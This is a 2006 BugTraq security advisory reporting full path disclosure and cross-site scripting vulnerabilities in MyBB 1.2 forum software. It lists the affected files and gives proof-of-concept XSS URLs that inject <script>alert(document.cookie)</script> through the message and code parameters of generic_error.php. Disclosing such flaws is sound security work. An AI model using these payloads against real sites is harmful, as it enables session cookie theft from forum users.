BugTraq
MyBB 1.2 Full path and Cross site scripting vulnerabilities Sep 17 2006 03:23PM
security soqor net
Hello

Title : MyBB 1.2 Full path and Cross site scripting vulnerabilities

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

Full path

inc/generic_error.php?message=1

inc/datahandlers/event.php

inc/datahandlers/pm.php

inc/datahandlers/post.php

inc/datahandlers/user.php

Full path and Xss

inc/generic_error.php?message=<script>alert(document.cookie);</script>

inc/generic_error.php?message=1&code=<script>alert(document.cookie);</sc
ript>

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus